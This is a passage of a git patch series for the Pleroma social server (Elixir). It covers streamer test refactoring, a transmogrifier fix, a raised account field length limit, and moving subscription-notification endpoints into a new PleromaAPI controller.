- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
- end
-
def start_socket(qs \\ nil, headers \\ []) do
path =
case qs do
@@ -53,12 +42,14 @@ test "requires authentication and a valid token for protected streams" do
end)
end
+ @tag needs_streamer: true
test "allows public streams without authentication" do
assert {:ok, _} = start_socket("?stream=public")
assert {:ok, _} = start_socket("?stream=public:local")
assert {:ok, _} = start_socket("?stream=hashtag&tag=lain")
end
+ @tag needs_streamer: true
test "receives well formatted events" do
user = insert(:user)
{:ok, _} = start_socket("?stream=public")
@@ -103,6 +94,7 @@ test "accepts valid tokens", state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{state.token.token}")
end
+ @tag needs_streamer: true
test "accepts the 'user' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user&access_token=#{token.token}")
@@ -111,6 +103,7 @@ test "accepts the 'user' stream", %{token: token} = _state do
end) =~ ":badarg"
end
+ @tag needs_streamer: true
test "accepts the 'user:notification' stream", %{token: token} = _state do
assert {:ok, _} = start_socket("?stream=user:notification&access_token=#{token.token}")
@@ -119,6 +112,7 @@ test "accepts the 'user:notification' stream", %{token: token} = _state do
end) =~ ":badarg"
end
+ @tag needs_streamer: true
test "accepts valid token on Sec-WebSocket-Protocol header", %{token: token} do
assert {:ok, _} = start_socket("?stream=user", [{"Sec-WebSocket-Protocol", token.token}])
diff --git a/test/notification_test.exs b/test/notification_test.exs
index 3be9db09b..3d2f9a8fc 100644
--- a/test/notification_test.exs
+++ b/test/notification_test.exs
@@ -69,16 +69,7 @@ test "does not create a notification for subscribed users if status is a reply"
end
describe "create_notification" do
- setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
- end
-
+ @tag needs_streamer: true
test "it creates a notification for user and send to the 'user' and the 'user:notification' stream" do
user = insert(:user)
task = Task.async(fn -> assert_receive {:text, _}, 4_000 end)
diff --git a/test/support/conn_case.ex b/test/support/conn_case.ex
index ec5892ff5..b39c70677 100644
--- a/test/support/conn_case.ex
+++ b/test/support/conn_case.ex
@@ -40,6 +40,10 @@ defmodule Pleroma.Web.ConnCase do
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, {:shared, self()})
end
+ if tags[:needs_streamer] do
+ start_supervised(Pleroma.Web.Streamer.supervisor())
+ end
+
{:ok, conn: Phoenix.ConnTest.build_conn()}
end
end
diff --git a/test/support/data_case.ex b/test/support/data_case.ex
index f3d98e7e3..17fa15214 100644
--- a/test/support/data_case.ex
+++ b/test/support/data_case.ex
@@ -39,6 +39,10 @@ defmodule Pleroma.DataCase do
Ecto.Adapters.SQL.Sandbox.mode(Pleroma.Repo, {:shared, self()})
end
+ if tags[:needs_streamer] do
+ start_supervised(Pleroma.Web.Streamer.supervisor())
+ end
+
:ok
end
diff --git a/test/web/activity_pub/activity_pub_test.exs b/test/web/activity_pub/activity_pub_test.exs
index d0118fefa..4100108a5 100644
--- a/test/web/activity_pub/activity_pub_test.exs
+++ b/test/web/activity_pub/activity_pub_test.exs
@@ -38,9 +38,7 @@ test "it streams them out" do
stream: fn _, _ -> nil end do
ActivityPub.stream_out_participations(conversation.participations)
- Enum.each(participations, fn participation ->
- assert called(Pleroma.Web.Streamer.stream("participation", participation))
- end)
+ assert called(Pleroma.Web.Streamer.stream("participation", participations))
end
end
end
diff --git a/test/web/streamer/ping_test.exs b/test/web/streamer/ping_test.exs
new file mode 100644
index 000000000..3d52c00e4
--- /dev/null
+++ b/test/web/streamer/ping_test.exs
@@ -0,0 +1,36 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.PingTest do
+ use Pleroma.DataCase
+
+ import Pleroma.Factory
+ alias Pleroma.Web.Streamer
+
+ setup do
+ start_supervised({Streamer.supervisor(), [ping_interval: 30]})
+
+ :ok
+ end
+
+ describe "sockets" do
+ setup do
+ user = insert(:user)
+ {:ok, %{user: user}}
+ end
+
+ test "it sends pings", %{user: user} do
+ task =
+ Task.async(fn ->
+ assert_receive {:text, received_event}, 40
+ assert_receive {:text, received_event}, 40
+ assert_receive {:text, received_event}, 40
+ end)
+
+ Streamer.add_socket("public", %{transport_pid: task.pid, assigns: %{user: user}})
+
+ Task.await(task)
+ end
+ end
+end
diff --git a/test/web/streamer/state_test.exs b/test/web/streamer/state_test.exs
new file mode 100644
index 000000000..d1aeac541
--- /dev/null
+++ b/test/web/streamer/state_test.exs
@@ -0,0 +1,54 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.StateTest do
+ use Pleroma.DataCase
+
+ import Pleroma.Factory
+ alias Pleroma.Web.Streamer
+ alias Pleroma.Web.Streamer.StreamerSocket
+
+ @moduletag needs_streamer: true
+
+ describe "sockets" do
+ setup do
+ user = insert(:user)
+ user2 = insert(:user)
+ {:ok, %{user: user, user2: user2}}
+ end
+
+ test "it can add a socket", %{user: user} do
+ Streamer.add_socket("public", %{transport_pid: 1, assigns: %{user: user}})
+
+ assert(%{"public" => [%StreamerSocket{transport_pid: 1}]} = Streamer.get_sockets())
+ end
+
+ test "it can add multiple sockets per user", %{user: user} do
+ Streamer.add_socket("public", %{transport_pid: 1, assigns: %{user: user}})
+ Streamer.add_socket("public", %{transport_pid: 2, assigns: %{user: user}})
+
+ assert(
+ %{
+ "public" => [
+ %StreamerSocket{transport_pid: 2},
+ %StreamerSocket{transport_pid: 1}
+ ]
+ } = Streamer.get_sockets()
+ )
+ end
+
+ test "it will not add a duplicate socket", %{user: user} do
+ Streamer.add_socket("activity", %{transport_pid: 1, assigns: %{user: user}})
+ Streamer.add_socket("activity", %{transport_pid: 1, assigns: %{user: user}})
+
+ assert(
+ %{
+ "activity" => [
+ %StreamerSocket{transport_pid: 1}
+ ]
+ } = Streamer.get_sockets()
+ )
+ end
+ end
+end
diff --git a/test/web/streamer_test.exs b/test/web/streamer/streamer_test.exs
similarity index 86%
rename from test/web/streamer_test.exs
rename to test/web/streamer/streamer_test.exs
index 96fa7645f..88847e20f 100644
--- a/test/web/streamer_test.exs
+++ b/test/web/streamer/streamer_test.exs
@@ -5,24 +5,20 @@
defmodule Pleroma.Web.StreamerTest do
use Pleroma.DataCase
+ import Pleroma.Factory
+
alias Pleroma.List
alias Pleroma.User
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.Streamer
- import Pleroma.Factory
+ alias Pleroma.Web.Streamer.StreamerSocket
+ alias Pleroma.Web.Streamer.Worker
+ @moduletag needs_streamer: true
clear_config_all([:instance, :skip_thread_containment])
describe "user streams" do
setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
-
user = insert(:user)
notify = insert(:notification, user: user, activity: build(:note_activity))
{:ok, %{user: user, notify: notify}}
@@ -125,11 +121,9 @@ test "it sends to public" do
assert_receive {:text, _}, 4_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user
- }
+ user: user
}
{:ok, activity} = CommonAPI.post(other_user, %{"status" => "Test"})
@@ -138,7 +132,7 @@ test "it sends to public" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
@@ -155,11 +149,9 @@ test "it sends to public" do
assert received_event == expected_event
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user
- }
+ user: user
}
{:ok, activity} = CommonAPI.delete(activity.id, other_user)
@@ -168,7 +160,7 @@ test "it sends to public" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -189,9 +181,9 @@ test "it doesn't send to user if recipients invalid and thread containment is en
)
task = Task.async(fn -> refute_receive {:text, _}, 1_000 end)
- fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
+ fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
topics = %{"public" => [fake_socket]}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -211,9 +203,9 @@ test "it sends message if recipients invalid and thread containment is disabled"
)
task = Task.async(fn -> assert_receive {:text, _}, 1_000 end)
- fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
+ fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
topics = %{"public" => [fake_socket]}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -233,9 +225,9 @@ test "it sends message if recipients invalid and thread containment is enabled b
)
task = Task.async(fn -> assert_receive {:text, _}, 1_000 end)
- fake_socket = %{transport_pid: task.pid, assigns: %{user: user}}
+ fake_socket = %StreamerSocket{transport_pid: task.pid, user: user}
topics = %{"public" => [fake_socket]}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -251,11 +243,9 @@ test "it doesn't send to blocked users" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user
- }
+ user: user
}
{:ok, activity} = CommonAPI.post(blocked_user, %{"status" => "Test"})
@@ -264,7 +254,7 @@ test "it doesn't send to blocked users" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", activity)
+ Worker.push_to_socket(topics, "public", activity)
Task.await(task)
end
@@ -284,11 +274,9 @@ test "it doesn't send unwanted DMs to list" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user_a
- }
+ user: user_a
}
{:ok, activity} =
@@ -301,7 +289,7 @@ test "it doesn't send unwanted DMs to list" do
"list:#{list.id}" => [fake_socket]
}
- Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
+ Worker.handle_call({:stream, "list", activity}, self(), topics)
Task.await(task)
end
@@ -318,11 +306,9 @@ test "it doesn't send unwanted private posts to list" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user_a
- }
+ user: user_a
}
{:ok, activity} =
@@ -335,12 +321,12 @@ test "it doesn't send unwanted private posts to list" do
"list:#{list.id}" => [fake_socket]
}
- Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
+ Worker.handle_call({:stream, "list", activity}, self(), topics)
Task.await(task)
end
- test "it send wanted private posts to list" do
+ test "it sends wanted private posts to list" do
user_a = insert(:user)
user_b = insert(:user)
@@ -354,11 +340,9 @@ test "it send wanted private posts to list" do
assert_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user_a
- }
+ user: user_a
}
{:ok, activity} =
@@ -367,11 +351,12 @@ test "it send wanted private posts to list" do
"visibility" => "private"
})
- topics = %{
- "list:#{list.id}" => [fake_socket]
- }
+ Streamer.add_socket(
+ "list:#{list.id}",
+ fake_socket
+ )
- Streamer.handle_cast(%{action: :stream, topic: "list", item: activity}, topics)
+ Worker.handle_call({:stream, "list", activity}, self(), %{})
Task.await(task)
end
@@ -387,11 +372,9 @@ test "it doesn't send muted reblogs" do
refute_receive {:text, _}, 1_000
end)
- fake_socket = %{
+ fake_socket = %StreamerSocket{
transport_pid: task.pid,
- assigns: %{
- user: user1
- }
+ user: user1
}
{:ok, create_activity} = CommonAPI.post(user3, %{"status" => "I'm kawen"})
@@ -401,7 +384,7 @@ test "it doesn't send muted reblogs" do
"public" => [fake_socket]
}
- Streamer.push_to_socket(topics, "public", announce_activity)
+ Worker.push_to_socket(topics, "public", announce_activity)
Task.await(task)
end
@@ -417,6 +400,8 @@ test "it doesn't send posts from muted threads" do
task = Task.async(fn -> refute_receive {:text, _}, 4_000 end)
+ Process.sleep(4000)
+
Streamer.add_socket(
"user",
%{transport_pid: task.pid, assigns: %{user: user2}}
@@ -428,14 +413,6 @@ test "it doesn't send posts from muted threads" do
describe "direct streams" do
setup do
- GenServer.start(Streamer, %{}, name: Streamer)
-
- on_exit(fn ->
- if pid = Process.whereis(Streamer) do
- Process.exit(pid, :kill)
- end
- end)
-
:ok
end
@@ -480,6 +457,8 @@ test "it doesn't send conversation update to the 'direct' streamj when the last
refute_receive {:text, _}, 4_000
end)
+ Process.sleep(1000)
+
Streamer.add_socket(
"direct",
%{transport_pid: task.pid, assigns: %{user: user}}
@@ -521,6 +500,8 @@ test "it sends conversation update to the 'direct' stream when a message is dele
assert last_status["id"] == to_string(create_activity.id)
end)
+ Process.sleep(1000)
+
Streamer.add_socket(
"direct",
%{transport_pid: task.pid, assigns: %{user: user}}
From 085d014f0859b3b3e5023c423ae0361ec6ed6c67 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Mon, 16 Sep 2019 19:26:00 +0700
Subject: [PATCH 082/272] Fix `Transmogrifier.upgrade_user_from_ap_id/1`
---
lib/pleroma/web/activity_pub/transmogrifier.ex | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/lib/pleroma/web/activity_pub/transmogrifier.ex b/lib/pleroma/web/activity_pub/transmogrifier.ex
index acb3087d0..8461b666e 100644
--- a/lib/pleroma/web/activity_pub/transmogrifier.ex
+++ b/lib/pleroma/web/activity_pub/transmogrifier.ex
@@ -1050,7 +1050,7 @@ def upgrade_user_from_ap_id(ap_id) do
with %User{local: false} = user <- User.get_cached_by_ap_id(ap_id),
{:ok, data} <- ActivityPub.fetch_and_prepare_user_from_ap_id(ap_id),
already_ap <- User.ap_enabled?(user),
- {:ok, user} <- user |> User.upgrade_changeset(data) |> User.update_and_set_cache() do
+ {:ok, user} <- user |> User.upgrade_changeset(data, true) |> User.update_and_set_cache() do
unless already_ap do
TransmogrifierWorker.enqueue("user_upgrade", %{"user_id" => user.id})
end
From d6ab78e610f16e97246ec9e83b3db72f04cf41e7 Mon Sep 17 00:00:00 2001
From: Egor Kislitsyn
Date: Mon, 16 Sep 2019 21:48:01 +0700
Subject: [PATCH 083/272] Set `account_field_value_length` limit to 2048 by
default
---
config/config.exs | 2 +-
config/description.exs | 4 ++--
docs/config.md | 2 +-
3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/config/config.exs b/config/config.exs
index b1b98af93..c7e0cf09f 100644
--- a/config/config.exs
+++ b/config/config.exs
@@ -276,7 +276,7 @@
max_account_fields: 10,
max_remote_account_fields: 20,
account_field_name_length: 512,
- account_field_value_length: 512,
+ account_field_value_length: 2048,
external_user_synchronization: true
config :pleroma, :markup,
diff --git a/config/description.exs b/config/description.exs
index be5eb0cc3..32d36d6d6 100644
--- a/config/description.exs
+++ b/config/description.exs
@@ -878,9 +878,9 @@
%{
key: :account_field_value_length,
type: :integer,
- description: "An account field value maximum length (default: 512)",
+ description: "An account field value maximum length (default: 2048)",
suggestions: [
- 512
+ 2048
]
},
%{
diff --git a/docs/config.md b/docs/config.md
index 270d7fcea..3f37fa561 100644
--- a/docs/config.md
+++ b/docs/config.md
@@ -135,7 +135,7 @@ config :pleroma, Pleroma.Emails.Mailer,
* `max_account_fields`: The maximum number of custom fields in the user profile (default: `10`)
* `max_remote_account_fields`: The maximum number of custom fields in the remote user profile (default: `20`)
* `account_field_name_length`: An account field name maximum length (default: `512`)
-* `account_field_value_length`: An account field value maximum length (default: `512`)
+* `account_field_value_length`: An account field value maximum length (default: `2048`)
* `external_user_synchronization`: Enabling following/followers counters synchronization for external users.
From 56b60798c2282055089424f5dc6770a10876626b Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Mon, 16 Sep 2019 20:50:14 +0300
Subject: [PATCH 084/272] Code style fixes
---
lib/pleroma/subscription_notification.ex | 72 +++++++++----------
.../views/subscription_notification_view.ex | 1 -
2 files changed, 33 insertions(+), 40 deletions(-)
diff --git a/lib/pleroma/subscription_notification.ex b/lib/pleroma/subscription_notification.ex
index 7ae25a7b1..9ce0c6598 100644
--- a/lib/pleroma/subscription_notification.ex
+++ b/lib/pleroma/subscription_notification.ex
@@ -56,7 +56,8 @@ def for_user_query(user, opts \\ []) do
if opts[:with_muted] do
query
else
- where(query, [n, a], a.actor not in ^user.info.muted_notifications)
+ query
+ |> where([n, a], a.actor not in ^user.info.muted_notifications)
|> where([n, a], a.actor not in ^user.info.blocks)
|> where(
[n, a],
@@ -88,9 +89,9 @@ def for_user(user, opts \\ %{}) do
"""
@spec for_user_since(Pleroma.User.t(), NaiveDateTime.t()) :: [t()]
def for_user_since(user, date) do
- from(n in for_user_query(user),
- where: n.updated_at > ^date
- )
+ user
+ |> for_user_query()
+ |> where([n], n.updated_at > ^date)
|> Repo.all()
end
@@ -112,10 +113,8 @@ def get(%{id: user_id} = _user, id) do
preload: [activity: activity]
)
- notification = Repo.one(query)
-
- case notification do
- %{user_id: ^user_id} ->
+ case Repo.one(query) do
+ %{user_id: ^user_id} = notification ->
{:ok, notification}
_ ->
@@ -137,10 +136,8 @@ def destroy_multiple(%{id: user_id} = _user, ids) do
end
def dismiss(%{id: user_id} = _user, id) do
- notification = Repo.get(SubscriptionNotification, id)
-
- case notification do
- %{user_id: ^user_id} ->
+ case Repo.get(SubscriptionNotification, id) do
+ %{user_id: ^user_id} = notification ->
Repo.delete(notification)
_ ->
@@ -149,21 +146,24 @@ def dismiss(%{id: user_id} = _user, id) do
end
def create_notifications(%Activity{data: %{"to" => _, "type" => "Create"}} = activity) do
- object = Object.normalize(activity)
+ case Object.normalize(activity) do
+ %{data: %{"type" => "Answer"}} ->
+ {:ok, []}
- unless object && object.data["type"] == "Answer" do
- users = get_notified_from_activity(activity)
- notifications = Enum.map(users, fn user -> create_notification(activity, user) end)
- {:ok, notifications}
- else
- {:ok, []}
+ _ ->
+ users = get_notified_from_activity(activity)
+ notifications = Enum.map(users, fn user -> create_notification(activity, user) end)
+ {:ok, notifications}
end
end
def create_notifications(%Activity{data: %{"to" => _, "type" => type}} = activity)
when type in ["Like", "Announce", "Follow"] do
- users = get_notified_from_activity(activity)
- notifications = Enum.map(users, fn user -> create_notification(activity, user) end)
+ notifications =
+ activity
+ |> get_notified_from_activity()
+ |> Enum.map(&create_notification(activity, &1))
+
{:ok, notifications}
end
@@ -188,12 +188,10 @@ def get_notified_from_activity(
local_only
)
when type in ["Create", "Like", "Announce", "Follow"] do
- recipients =
- []
- |> Utils.maybe_notify_subscribers(activity)
- |> Enum.uniq()
-
- User.get_users_from_set(recipients, local_only)
+ []
+ |> Utils.maybe_notify_subscribers(activity)
+ |> Enum.uniq()
+ |> User.get_users_from_set(local_only)
end
def get_notified_from_activity(_, _local_only), do: []
@@ -218,12 +216,12 @@ def skip?(:self, activity, user) do
def skip?(
:followers,
- activity,
+ %{data: %{"actor" => actor}},
%{info: %{notification_settings: %{"followers" => false}}} = user
) do
- actor = activity.data["actor"]
- follower = User.get_cached_by_ap_id(actor)
- User.following?(follower, user)
+ actor
+ |> User.get_cached_by_ap_id()
+ |> User.following?(user)
end
def skip?(
@@ -252,14 +250,10 @@ def skip?(
!User.following?(user, followed)
end
- def skip?(:recently_followed, %{data: %{"type" => "Follow"}} = activity, user) do
- actor = activity.data["actor"]
-
- SubscriptionNotification.for_user(user)
- |> Enum.any?(fn
- %{activity: %{data: %{"type" => "Follow", "actor" => ^actor}}} -> true
- _ -> false
- end)
+ def skip?(:recently_followed, %{data: %{"type" => "Follow", "actor" => actor}}, user) do
+ user
+ |> SubscriptionNotification.for_user()
+ |> Enum.any?(&match?(%{activity: %{data: %{"type" => "Follow", "actor" => ^actor}}}, &1))
end
def skip?(_, _, _), do: false
diff --git a/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex b/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
index c6f0b5064..83d2b647f 100644
--- a/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
+++ b/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
@@ -6,7 +6,6 @@ defmodule Pleroma.Web.MastodonAPI.SubscriptionNotificationView do
use Pleroma.Web, :view
alias Pleroma.Activity
- # alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web.CommonAPI
alias Pleroma.Web.MastodonAPI.AccountView
From 6042e21b25885f9c3214d3296d9d2fdf35ad58ea Mon Sep 17 00:00:00 2001
From: Roman Chvanikov
Date: Mon, 16 Sep 2019 21:59:49 +0300
Subject: [PATCH 085/272] Move subscription notifications to a separate
controller
---
.../controllers/mastodon_api_controller.ex | 48 ----
lib/pleroma/web/mastodon_api/mastodon_api.ex | 10 -
lib/pleroma/web/pleroma_api/pleroma_api.ex | 40 +++
.../subscription_notification_controller.ex | 59 +++++
.../views/subscription_notification_view.ex | 4 +-
lib/pleroma/web/router.ex | 33 +--
.../mastodon_api_controller_test.exs | 192 --------------
...scription_notification_controller_test.exs | 234 ++++++++++++++++++
8 files changed, 343 insertions(+), 277 deletions(-)
create mode 100644 lib/pleroma/web/pleroma_api/pleroma_api.ex
create mode 100644 lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
rename lib/pleroma/web/{mastodon_api => pleroma_api}/views/subscription_notification_view.ex (93%)
create mode 100644 test/web/pleroma_api/subscription_notification_controller_test.exs
diff --git a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
index eefdb8c06..060137b80 100644
--- a/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
+++ b/lib/pleroma/web/mastodon_api/controllers/mastodon_api_controller.ex
@@ -23,7 +23,6 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
alias Pleroma.Repo
alias Pleroma.ScheduledActivity
alias Pleroma.Stats
- alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web
alias Pleroma.Web.ActivityPub.ActivityPub
@@ -40,7 +39,6 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPIController do
alias Pleroma.Web.MastodonAPI.ReportView
alias Pleroma.Web.MastodonAPI.ScheduledActivityView
alias Pleroma.Web.MastodonAPI.StatusView
- alias Pleroma.Web.MastodonAPI.SubscriptionNotificationView
alias Pleroma.Web.MediaProxy
alias Pleroma.Web.OAuth.App
alias Pleroma.Web.OAuth.Authorization
@@ -727,28 +725,6 @@ def notifications(%{assigns: %{user: user}} = conn, params) do
|> render("index.json", %{notifications: notifications, for: user})
end
- def subscription_notifications(%{assigns: %{user: user}} = conn, params) do
- notifications = MastodonAPI.get_subscription_notifications(user, params)
-
- conn
- |> add_link_headers(:subscription_notifications, notifications)
- |> put_view(SubscriptionNotificationView)
- |> render("index.json", %{notifications: notifications, for: user})
- end
-
- def get_subscription_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
- with {:ok, notification} <- SubscriptionNotification.get(user, id) do
- conn
- |> put_view(SubscriptionNotificationView)
- |> render("show.json", %{subscription_notification: notification, for: user})
- else
- {:error, reason} ->
- conn
- |> put_status(:forbidden)
- |> json(%{"error" => reason})
- end
- end
-
def get_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, notification} <- Notification.get(user, id) do
conn
@@ -767,11 +743,6 @@ def clear_notifications(%{assigns: %{user: user}} = conn, _params) do
json(conn, %{})
end
- def clear_subscription_notifications(%{assigns: %{user: user}} = conn, _params) do
- SubscriptionNotification.clear(user)
- json(conn, %{})
- end
-
def dismiss_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
with {:ok, _notif} <- Notification.dismiss(user, id) do
json(conn, %{})
@@ -783,30 +754,11 @@ def dismiss_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _para
end
end
- def dismiss_subscription_notification(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
- with {:ok, _notif} <- SubscriptionNotification.dismiss(user, id) do
- json(conn, %{})
- else
- {:error, reason} ->
- conn
- |> put_status(:forbidden)
- |> json(%{"error" => reason})
- end
- end
-
def destroy_multiple(%{assigns: %{user: user}} = conn, %{"ids" => ids} = _params) do
Notification.destroy_multiple(user, ids)
json(conn, %{})
end
- def destroy_multiple_subscription_notifications(
- %{assigns: %{user: user}} = conn,
- %{"ids" => ids} = _params
- ) do
- SubscriptionNotification.destroy_multiple(user, ids)
- json(conn, %{})
- end
-
def relationships(%{assigns: %{user: user}} = conn, %{"id" => id}) do
id = List.wrap(id)
q = from(u in User, where: u.id in ^id)
diff --git a/lib/pleroma/web/mastodon_api/mastodon_api.ex b/lib/pleroma/web/mastodon_api/mastodon_api.ex
index 6751e24d8..ac01d1ff3 100644
--- a/lib/pleroma/web/mastodon_api/mastodon_api.ex
+++ b/lib/pleroma/web/mastodon_api/mastodon_api.ex
@@ -10,7 +10,6 @@ defmodule Pleroma.Web.MastodonAPI.MastodonAPI do
alias Pleroma.Notification
alias Pleroma.Pagination
alias Pleroma.ScheduledActivity
- alias Pleroma.SubscriptionNotification
alias Pleroma.User
alias Pleroma.Web.CommonAPI
@@ -63,15 +62,6 @@ def get_notifications(user, params \\ %{}) do
|> Pagination.fetch_paginated(params)
end
- def get_subscription_notifications(user, params \\ %{}) do
- options = cast_params(params)
-
- user
- |> SubscriptionNotification.for_user_query(options)
- |> restrict(:exclude_types, options)
- |> Pagination.fetch_paginated(params)
- end
-
def get_scheduled_activities(user, params \\ %{}) do
user
|> ScheduledActivity.for_user_query()
diff --git a/lib/pleroma/web/pleroma_api/pleroma_api.ex b/lib/pleroma/web/pleroma_api/pleroma_api.ex
new file mode 100644
index 000000000..480964845
--- /dev/null
+++ b/lib/pleroma/web/pleroma_api/pleroma_api.ex
@@ -0,0 +1,40 @@
+defmodule Pleroma.Web.PleromaAPI.PleromaAPI do
+ import Ecto.Query
+ import Ecto.Changeset
+
+ alias Pleroma.Activity
+ alias Pleroma.Pagination
+ alias Pleroma.SubscriptionNotification
+
+ def get_subscription_notifications(user, params \\ %{}) do
+ options = cast_params(params)
+
+ user
+ |> SubscriptionNotification.for_user_query(options)
+ |> restrict(:exclude_types, options)
+ |> Pagination.fetch_paginated(params)
+ end
+
+ defp cast_params(params) do
+ param_types = %{
+ exclude_types: {:array, :string},
+ reblogs: :boolean,
+ with_muted: :boolean
+ }
+
+ changeset = cast({%{}, param_types}, params, Map.keys(param_types))
+ changeset.changes
+ end
+
+ defp restrict(query, :exclude_types, %{exclude_types: mastodon_types = [_ | _]}) do
+ ap_types =
+ mastodon_types
+ |> Enum.map(&Activity.from_mastodon_notification_type/1)
+ |> Enum.filter(& &1)
+
+ query
+ |> where([q, a], not fragment("? @> ARRAY[?->>'type']::varchar[]", ^ap_types, a.data))
+ end
+
+ defp restrict(query, _, _), do: query
+end
diff --git a/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
new file mode 100644
index 000000000..bfc2631dd
--- /dev/null
+++ b/lib/pleroma/web/pleroma_api/subscription_notification_controller.ex
@@ -0,0 +1,59 @@
+# Pleroma: A lightweight social networking server
+# Copyright © 2017-2019 Pleroma Authors
+# SPDX-License-Identifier: AGPL-3.0-only
+
+defmodule Pleroma.Web.PleromaAPI.SubscriptionNotificationController do
+ use Pleroma.Web, :controller
+
+ import Pleroma.Web.ControllerHelper, only: [add_link_headers: 2]
+
+ alias Pleroma.SubscriptionNotification
+ alias Pleroma.Web.PleromaAPI.PleromaAPI
+ alias Pleroma.Web.PleromaAPI.SubscriptionNotificationView
+
+ def list(%{assigns: %{user: user}} = conn, params) do
+ notifications = PleromaAPI.get_subscription_notifications(user, params)
+
+ conn
+ |> add_link_headers(notifications)
+ |> put_view(SubscriptionNotificationView)
+ |> render("index.json", %{notifications: notifications, for: user})
+ end
+
+ def get(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
+ with {:ok, notification} <- SubscriptionNotification.get(user, id) do
+ conn
+ |> put_view(SubscriptionNotificationView)
+ |> render("show.json", %{subscription_notification: notification, for: user})
+ else
+ {:error, reason} ->
+ conn
+ |> put_status(:forbidden)
+ |> json(%{"error" => reason})
+ end
+ end
+
+ def clear(%{assigns: %{user: user}} = conn, _params) do
+ SubscriptionNotification.clear(user)
+ json(conn, %{})
+ end
+
+ def dismiss(%{assigns: %{user: user}} = conn, %{"id" => id} = _params) do
+ with {:ok, _notif} <- SubscriptionNotification.dismiss(user, id) do
+ json(conn, %{})
+ else
+ {:error, reason} ->
+ conn
+ |> put_status(:forbidden)
+ |> json(%{"error" => reason})
+ end
+ end
+
+ def destroy_multiple(
+ %{assigns: %{user: user}} = conn,
+ %{"ids" => ids} = _params
+ ) do
+ SubscriptionNotification.destroy_multiple(user, ids)
+ json(conn, %{})
+ end
+end
diff --git a/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex b/lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex
similarity index 93%
rename from lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
rename to lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex
index 83d2b647f..d7f7f4c5a 100644
--- a/lib/pleroma/web/mastodon_api/views/subscription_notification_view.ex
+++ b/lib/pleroma/web/pleroma_api/views/subscription_notification_view.ex
@@ -2,15 +2,15 @@
# Copyright © 2017-2019 Pleroma Authors
# SPDX-License-Identifier: AGPL-3.0-only
-defmodule Pleroma.Web.MastodonAPI.SubscriptionNotificationView do
